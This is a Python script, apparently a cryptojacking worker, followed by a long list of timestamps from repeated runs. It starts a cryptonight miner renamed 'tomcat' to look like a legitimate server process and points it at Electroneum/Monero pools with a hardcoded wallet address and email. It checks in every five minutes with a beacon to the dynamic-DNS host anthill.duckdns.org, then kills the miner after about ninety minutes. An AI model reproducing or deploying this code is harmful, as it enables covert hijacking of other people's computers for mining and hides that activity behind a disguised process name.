import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:16:05.288636
#2018-02-17 16:03:05.151048
#2018-02-17 17:49:06.755138
#2018-02-17 19:37:04.741116
#2018-02-17 21:27:06.326456
#2018-02-17 23:12:01.596347
#2018-02-18 00:58:06.189366
#2018-02-18 02:46:07.356261
#2018-02-18 04:34:02.022486
#2018-02-18 06:25:03.758303
#2018-02-18 08:14:07.010769
#2018-02-18 10:02:01.709498
#2018-02-18 11:48:08.202443
#2018-02-18 13:34:07.191214
#2018-02-18 15:24:01.998909
#2018-02-18 17:12:05.620636
#2018-02-18 19:00:07.257849
#2018-02-18 20:47:05.046644
#2018-02-18 22:33:06.589575
#2018-02-19 00:21:04.541534
#2018-02-19 02:07:04.706358
#2018-02-19 03:55:05.406747
#2018-02-19 05:41:05.688367
#2018-02-19 07:29:01.611400
#2018-02-19 09:19:01.774349
#2018-02-19 11:08:02.038461
#2018-02-19 12:54:07.371877
#2018-02-19 14:43:05.905907
#2018-02-19 16:32:07.173494
#2018-02-19 18:17:07.576910
#2018-02-19 20:04:04.351683
#2018-02-19 21:53:01.608170
#2018-02-19 23:38:07.034304
#2018-02-20 01:24:04.043058
#2018-02-20 03:13:07.608930
#2018-02-20 05:00:09.592996
#2018-02-20 06:44:05.417086
#2018-02-20 08:31:05.989505
#2018-02-20 10:15:08.196901
#2018-02-20 11:59:06.835821
#2018-02-20 13:47:08.888836
#2018-02-20 15:32:07.724110
#2018-02-20 17:18:07.820714
#2018-02-20 19:07:05.791454
#2018-02-20 20:57:05.242650
#2018-02-20 22:43:07.483152
#2018-02-21 00:26:07.172285
#2018-02-21 02:12:08.024181
#2018-02-21 04:01:01.297086
#2018-02-21 05:48:05.191147
#2018-02-21 07:37:02.093623
#2018-02-21 09:22:05.578865
#2018-02-21 11:10:07.946174
#2018-02-21 12:58:05.742356
#2018-02-21 14:47:01.720290
#2018-02-21 16:36:06.231541
#2018-02-21 18:26:04.274117
#2018-02-21 20:13:05.392458
#2018-02-21 22:02:06.804514
#2018-02-21 23:49:08.767036
#2018-02-22 01:38:06.906755
#2018-02-22 03:25:07.745416
#2018-02-22 05:11:06.609912
#2018-02-22 06:55:09.467823
#2018-02-22 08:42:01.907545
#2018-02-22 10:29:05.935790
#2018-02-22 12:14:08.042746
#2018-02-22 14:00:06.637014
#2018-02-22 15:47:08.642500
#2018-02-22 17:34:09.657692
#2018-02-22 19:20:10.281226
#2018-02-22 21:11:08.563636
#2018-02-22 22:57:03.588527
#2018-02-23 00:43:07.894346
#2018-02-23 02:32:04.978989
#2018-02-23 04:21:04.131438
#2018-02-23 06:07:07.330804
#2018-02-23 07:53:01.532861
#2018-02-23 10:15:05.602027
#2018-02-23 12:08:07.885590
#2018-02-23 13:56:08.372363
#2018-02-23 15:47:06.436003
#2018-02-23 17:32:10.591232
#2018-02-23 19:19:01.633059
#2018-02-23 21:02:07.361537
#2018-02-23 22:49:08.274745
#2018-02-24 00:38:07.710353
#2018-02-24 02:28:01.792167
#2018-02-24 04:18:07.637263
#2018-02-24 06:06:05.574594
#2018-02-24 07:53:05.269574
#2018-02-24 09:38:06.432222
#2018-02-24 11:35:08.795679
#2018-02-24 13:26:01.684495
#2018-02-24 15:15:05.868835
#2018-02-24 17:05:01.429636
#2018-02-24 18:55:06.400650
#2018-02-24 20:42:08.131965
#2018-02-24 22:52:04.043832
#2018-02-25 02:12:02.104817
#2018-02-25 05:56:06.377515
#2018-02-25 11:38:01.700672